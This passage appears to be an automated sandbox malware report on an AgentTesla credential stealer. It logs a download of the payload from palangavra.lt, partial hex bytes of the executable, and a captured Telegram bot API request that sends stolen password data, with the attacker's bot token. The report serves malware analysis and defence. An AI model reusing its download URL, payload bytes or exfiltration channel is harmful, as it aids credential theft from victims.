                                                                                Oct 14, 2021 10:24:56.270032883 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.289134979 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api.telegram.org
                                                                                • palangavra.lt

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                TimestampkBytes transferredDirectionData


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.2249167144.76.47.16780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Oct 14, 2021 10:22:59.071497917 CEST0OUTGET /jukiestay/gufoxqa.exe HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: palangavra.lt
                                                                                Connection: Keep-Alive
                                                                                Oct 14, 2021 10:22:59.100934982 CEST2INHTTP/1.1 200 OK
                                                                                Date: Thu, 14 Oct 2021 08:22:59 GMT
                                                                                Server: Apache
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, Keep-Alive
                                                                                Last-Modified: Thu, 14 Oct 2021 01:10:12 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 486912
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Content-Type: application/x-msdownload
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04 72 09 46 00 70 7e 41 00 00 04 02 28 16 01 00 06 8c 64 00 00 01 28 19 01 00 06 28 13 01 00 06 2a 3e 02 04 28 4f 00 00 06 02 03 7d aa 00 00 04 2a 3e 02 7b aa 00 00 04 02 7b aa 00 00 04 5a 6c 2a 3e 02 04 28 4f 00 00 06 02 03 7d ab 00 00 04 2a 66 02 7b ab 00 00 04 02 7b ab 00 00 04 5a 6c 23 18 2d 44 54 fb 21 09 40 5a 2a 5a 02 05 28 4f 00 00 06 02 03 7d ac 00 00 04 02 04 7d ad 00 00 04 2a 3e 02 7b ac 00 00 04 02 7b ad 00 00 04 5a 6c 2a 32 7e 98 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgaV>t @ @sS H.textDT V `.rsrcX@@.relocl@B tHX\EbIvan Medvedev2~'(*(*2~5(*{*"}*{*"}*{*"}*R~;({*{*"}*{*"}*{*"}*~>~<(rEp~=((*{*"}*{*"}*N(~?(*{*"}*~>~@(rEp~BrFp~A(d((*>(O}*>{{Zl*>(O}*f{{Zl#-DT!@Z*Z(O}}*>{{Zl*2~
                                                                                Oct 14, 2021 10:22:59.101016045 CEST3INData Raw: 04 02 28 cc 00 00 06 2a 1e 02 28 b5 00 00 0a 2a 06 2a 1e 02 7b c8 00 00 04 2a 1e 02 7b c9 00 00 04 2a 3a 7e 03 00 00 04 02 03 04 28 ab 00 00 06 2a 1e 02 7b ca 00 00 04 2a 1e 02 7b cb 00 00 04 2a 3a 7e 05 00 00 04 02 03 04 28 b6 00 00 06 2a ea 02
                                                                                Data Ascii: (*(**{*{*:~(*{*{*:~(*(fff .M ai#=j#FY(oYYe}*{*6~(*{*{*{*{*{*{*.~(*.~v(*.~(
                                                                                Oct 14, 2021 10:22:59.101078987 CEST4INData Raw: 00 06 d0 7e 00 00 04 00 23 00 00 00 00 00 00 39 40 23 00 00 00 00 00 80 39 40 28 78 00 00 0a 58 28 6f 00 00 0a 28 0a 00 00 06 d0 7d 00 00 04 00 23 00 00 00 00 00 00 00 40 23 00 00 00 00 00 40 59 40 5a 28 6f 00 00 0a 28 14 00 00 06 d0 7c 00 00 04
                                                                                Data Ascii: ~#9@#9@(xX(o(}#@#@Y@Z(o(|#@#[@[(o({#v@#^@(yY(o(z#=@#=@(pX(o(y#h@#X@(uY(o(x#
                                                                                Oct 14, 2021 10:22:59.101130962 CEST6INData Raw: 23 00 00 00 00 00 00 16 40 28 75 00 00 0a 59 28 6f 00 00 0a 28 08 00 00 06 d0 5a 00 00 04 00 23 7f b4 e9 80 81 29 5f 40 23 00 00 00 00 00 40 4d 40 28 71 00 00 0a 59 28 6f 00 00 0a 28 10 00 00 06 d0 59 00 00 04 00 23 00 00 00 00 00 00 51 40 23 00
                                                                                Data Ascii: #@(uY(o(Z#)_@#@M@(qY(o(Y#Q@#Q@(nX(o(&X#ApW2h@#W@(qY(o(W#Uho@#`^@(qY(o("V#@#J@[(o(U#@@#S
                                                                                Oct 14, 2021 10:22:59.101185083 CEST7INData Raw: 00 00 0a 28 12 00 00 06 d0 37 00 00 04 00 23 00 00 00 00 00 00 1c 40 23 00 00 00 00 00 00 1a 40 28 74 00 00 0a 58 28 6f 00 00 0a 28 10 00 00 06 d0 36 00 00 04 00 23 00 00 00 00 00 80 53 40 23 00 00 00 00 00 40 43 40 28 75 00 00 0a 59 28 6f 00 00
                                                                                Data Ascii: (7#@#@(tX(o(6#S@#@C@(uY(o(5#@/Db@#R@(wX(o(4#&\@#L@(wX(o(3#@#C@Z(o("2#4@#4@(yX(o($
                                                                                Oct 14, 2021 10:22:59.101238966 CEST9INData Raw: 59 28 6f 00 00 0a 28 12 00 00 06 d0 14 00 00 04 00 20 44 6d 53 32 20 be 6d 53 32 61 69 28 20 00 00 06 d0 13 00 00 04 00 23 00 00 00 00 00 40 55 40 23 00 00 00 00 00 40 55 40 28 6e 00 00 0a 58 28 6f 00 00 0a 28 10 00 00 06 d0 12 00 00 04 00 23 00
                                                                                Data Ascii: Y(o( DmS2 mS2ai( #@U@#@U@(nX(o(#T@#T@X(o(#^k@#[@(vY(o(#iE@#7@(zX(o(#Q]@#@M@(rX(o(#E
                                                                                Oct 14, 2021 10:22:59.101289034 CEST10INData Raw: 00 00 70 28 b1 00 00 06 28 c7 00 00 06 2d 1c 7e 0b 00 00 04 7e 0a 00 00 04 06 72 69 00 00 70 28 b1 00 00 06 28 c7 00 00 06 2c 0b 7e 0c 00 00 04 14 28 c0 00 00 06 7e 0d 00 00 04 14 fe 06 03 00 00 06 73 7c 00 00 0a 28 cc 00 00 06 0d 7e 0e 00 00 04
                                                                                Data Ascii: p((-~~rip((,~(~s|(~#A#@[(or7p({[#@#@X(or7p({[X#A#@(yY(or7p({[Y(~(*0u:
                                                                                Oct 14, 2021 10:22:59.101342916 CEST12INData Raw: 82 4a 17 2a 42 f8 40 23 00 00 00 00 30 42 e8 40 28 76 00 00 0a 58 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 00 23 00 00 00 00 80 c3 d5 40 23 00 00 00 00 80 04 bd 40 28 70 00 00 0a 59 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b
                                                                                Data Ascii: J*B@#0B@(vX(or7p({[X#@#@(pY(or7p({[Xoorp({rp({ai#+1@#@(sX(or7p({[X#\@#\@(yX(or7p({[X#A#p[(o#.O&
                                                                                Oct 14, 2021 10:22:59.101458073 CEST13INData Raw: 7b 00 00 0a 5b 59 5a 00 00 23 e0 95 af dd c9 32 f4 40 23 00 00 00 00 80 32 e4 40 28 77 00 00 0a 59 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 00 23 b7 0e f5 4c 6d e9 cb 40 23 00 00 00 00 80 e7 bb 40 28 77 00 00 0a 59 28 6f 00 00 0a 00 72
                                                                                Data Ascii: {[YZ#2@#2@(wY(or7p({[#Lm@#@(wY(or7p({[X#[%@#@(sY(or7p({[Y##Y(o#1@#@(sY(or7p({[X#TA#@[(or7p({[X
                                                                                Oct 14, 2021 10:22:59.101537943 CEST14INData Raw: 00 0a 61 69 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 00 00 72 53 02 00 70 28 7b 00 00 0a 00 72 69 02 00 70 28 7b 00 00 0a 61 69 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 59 25 0c 91 61 00 00 23 00 00 00 00 00 58 cd 40 23 00 00 00 00 00 58 cd 40 58 28
                                                                                Data Ascii: air7p({[XrSp({rip({air7p({[XY%a#X@#X@X(or7p({[rp({rp({air7p({[Xrp({rp({air7p({[Y#@#@ZZ(o#@#L@(yY(or7p({[X
                                                                                Oct 14, 2021 10:22:59.123496056 CEST16INData Raw: 00 00 23 00 00 00 00 00 00 00 40 23 00 00 00 00 50 d7 eb c0 5a 28 6f 00 00 0a 00 23 00 00 00 00 40 9a db 40 23 00 00 00 00 20 9a db 40 28 6e 00 00 0a 58 28 6f 00 00 0a 00 72 37 00 00 70 28 7b 00 00 0a 5b 58 00 00 72 27 03 00 70 28 7b 00 00 0a 00
                                                                                Data Ascii: #@#PZ(o#@@# @(nX(or7p({[Xr'p({r=p({air7p({[XXi?vorpoo-o-+#@$@#@$@(pX(or7p({[#0@#@(nY(or


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2021-10-14 08:24:56 UTC0OUTPOST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
                                                                                Host: api.telegram.org
                                                                                Content-Length: 1018
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2021-10-14 08:24:56 UTC0INHTTP/1.1 100 Continue
                                                                                2021-10-14 08:24:56 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 36 36 37 30 36 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 35 37 39 35 36 39 0a 4f 53 46 75 6c 6c
                                                                                Data Ascii: -----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="chat_id"1366706404-----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/579569OSFull
                                                                                2021-10-14 08:24:56 UTC1INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Thu, 14 Oct 2021 08:24:56 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 656
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":3749,"from":{"id":2034238293,"is_bot":true,"first_name":"takership","username":"takership_bot"},"chat":{"id":1366706404,"first_name":"\u627f\u529e\u4eba","last_name":"taker","username":"dtaker","type":"private"},"date":1634199896,"document":{"file_name":"user-579569 2021-10-14 02-52-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIOpWFn6Vjq-3ycowABiEmEbyiu600j-gACwwgAAnGTQVMHP73qYkATfSEE","file_unique_id":"AgADwwgAAnGTQVM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/579569\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                Code Manipulations

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: WINWORD.EXE PID: 236 Parent PID: 596

                                                                                General

                                                                                Start time:10:22:14
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                Imagebase:0x13fbe0000
                                                                                File size:1423704 bytes
                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: EQNEDT32.EXE PID: 512 Parent PID: 596

                                                                                General

                                                                                Start time:10:22:15
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Chronological Activities

                                                                                Analysis Process: gudostrp.exe PID: 1212 Parent PID: 512

                                                                                General

                                                                                Start time:10:22:17
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                Chronological Activities

                                                                                Analysis Process: gudostrp.exe PID: 2576 Parent PID: 1212

                                                                                General

                                                                                Start time:10:22:42
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Chronological Activities

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >

                                                                                  Analysis Process: gudostrp.exe PID: 1212 Parent PID: 512 gudostrp.exeCOMMON

                                                                                  Executed Functions

                                                                                  Function 02025CE8, Relevance: 7.7, Strings: 2, Instructions: 5197COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462986106.0000000002020000.00000040.00000001.sdmp, Offset: 02020000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$x
                                                                                  • API String ID: 0-1344127822
                                                                                  • Opcode ID: d6828d9c424f060da569abce817cb8ef534eb30e70dccd3961d8f1d3f76c4453
                                                                                  • Instruction ID: a12da43f873accce8ca2f41be39d67037ad76408614f46d301ee78dd871da263
                                                                                  • Opcode Fuzzy Hash: d6828d9c424f060da569abce817cb8ef534eb30e70dccd3961d8f1d3f76c4453
                                                                                  • Instruction Fuzzy Hash: 6CA34B70E49228CBC724EF68D98875DBBB1FB88304F1288EAD54CA3254DB386D95CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0030348D, Relevance: 5.8, Strings: 1, Instructions: 4560COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: n
                                                                                  • API String ID: 0-2013832146
                                                                                  • Opcode ID: e5af1d6dc319d6105ad91f0a9402fe0bee0a4287b9ea65c0ab3d9503793f1ee7
                                                                                  • Instruction ID: f050a8737b9906539fd6a0063b095c0ad85dad9e27f8cf6f94970faeb322cdb5
                                                                                  • Opcode Fuzzy Hash: e5af1d6dc319d6105ad91f0a9402fe0bee0a4287b9ea65c0ab3d9503793f1ee7
                                                                                  • Instruction Fuzzy Hash: DBA33B70D0A218CFC7A9EF28E894AADBBB5FB48700F1145EAD588A3250DF345E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00721D30, Relevance: 5.5, Strings: 1, Instructions: 4229COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .@l
                                                                                  • API String ID: 0-2179369065
                                                                                  • Opcode ID: 4f1a441f8c4c9d9a7fdad4b3d14db3375cad2daec2e2896a07144d14455e2679
                                                                                  • Instruction ID: 3506fac6068a55c7a4a3121d0b149295d9527a348bc36511369ac90504faa28c
                                                                                  • Opcode Fuzzy Hash: 4f1a441f8c4c9d9a7fdad4b3d14db3375cad2daec2e2896a07144d14455e2679
                                                                                  • Instruction Fuzzy Hash: 1A835D70E44228CBDB24FF78D8846ADBBB6BB88304F0188E9D548A3354DB356E95CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 041D0048, Relevance: 5.1, Instructions: 5088COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43f872e688473f42257992a2f0db293e454565053f487dd6acde1a4a009c668d
                                                                                  • Instruction ID: 392313a589fe7dbde0459b579b5089b4df23002f4b3b10847062e6962920cd42
                                                                                  • Opcode Fuzzy Hash: 43f872e688473f42257992a2f0db293e454565053f487dd6acde1a4a009c668d
                                                                                  • Instruction Fuzzy Hash: FBA35C70E4A228CBC754EF68D88865DBBB2EB88304F4188E9D54CA3354DF386D95CF56
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FC5620, Relevance: 5.0, Instructions: 5006COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462960261.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88370aa571fdc41444278bab2f94a948a6484cc7ec334cdf30eca2bf887dba92
                                                                                  • Instruction ID: 8517ec20e8b7b62c7216e21c8957256da0aee99911051e311d2c8aa1ca78a2db
                                                                                  • Opcode Fuzzy Hash: 88370aa571fdc41444278bab2f94a948a6484cc7ec334cdf30eca2bf887dba92
                                                                                  • Instruction Fuzzy Hash: 5DA36A70E4922CCFC764EF68D98869DBBB1FB88304F0188E9D548A3254DB346E95DF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00308ED7, Relevance: 4.6, Instructions: 4556COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ba8e8d699f9b4aa629bf4c11043f63c92c50862b1854c8f324fd39ab3ee250a5
                                                                                  • Instruction ID: 500f5e88021521b5c5235b3dd2d3f7c7898c3f2331d6cc970ee7cb0e2788fa7d
                                                                                  • Opcode Fuzzy Hash: ba8e8d699f9b4aa629bf4c11043f63c92c50862b1854c8f324fd39ab3ee250a5
                                                                                  • Instruction Fuzzy Hash: 99A35C70E19218CFCB29EF68ECA56ADBBB5EB48300F0185E9D54CA3250DB346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FD0048, Relevance: 4.5, Instructions: 4522COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462970655.0000000001FD0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b5109b5cceac4cf0e2bca7395680650ced3aa97ec50e3bc5d4e0732e1f7c182
                                                                                  • Instruction ID: 4611689b750490eef1421ef60cbdf3550c99dc2967260a86c53d6e1a25cbdd3b
                                                                                  • Opcode Fuzzy Hash: 4b5109b5cceac4cf0e2bca7395680650ced3aa97ec50e3bc5d4e0732e1f7c182
                                                                                  • Instruction Fuzzy Hash: 87A32A70D0A21CCFD728EF38E995AADBBB2EB88204F0145E9D54CA3254DB346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FC0048, Relevance: 4.5, Instructions: 4502COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462960261.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e0cb5c0dade7e2fd9b83cc1a0f426a44abf3422c231ec5e574b569f474bcd86
                                                                                  • Instruction ID: 2d2d9f231f7a5749feed54a3b02b204fac0413358dc964cee2112802b002b5a7
                                                                                  • Opcode Fuzzy Hash: 5e0cb5c0dade7e2fd9b83cc1a0f426a44abf3422c231ec5e574b569f474bcd86
                                                                                  • Instruction Fuzzy Hash: 17A33D70E0921CCFCB28EF28E9A46ADBBB1FB88304F0145E9D548A3254DB346E95DF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FB0048, Relevance: 4.5, Instructions: 4481COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462950861.0000000001FB0000.00000040.00000001.sdmp, Offset: 01FB0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53ea479f8dd59e9b4747030f3c74f64f182f77f33287d2440888467539a0ab1c
                                                                                  • Instruction ID: b1687f312e7567519100767b5108cb8e9a1aa4df4eddc7169ccfbfab0d67bdc2
                                                                                  • Opcode Fuzzy Hash: 53ea479f8dd59e9b4747030f3c74f64f182f77f33287d2440888467539a0ab1c
                                                                                  • Instruction Fuzzy Hash: E4A34A70E0922CCFCB28EF28E9946ADBBB1FB88304F0145E9D549A3254DB346E95CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FA5EA8, Relevance: 4.4, Instructions: 4413COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
